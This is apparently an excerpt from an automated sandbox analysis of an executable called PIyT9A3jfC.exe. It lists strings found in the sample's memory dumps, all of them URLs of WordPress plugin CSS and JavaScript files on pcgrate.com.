                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
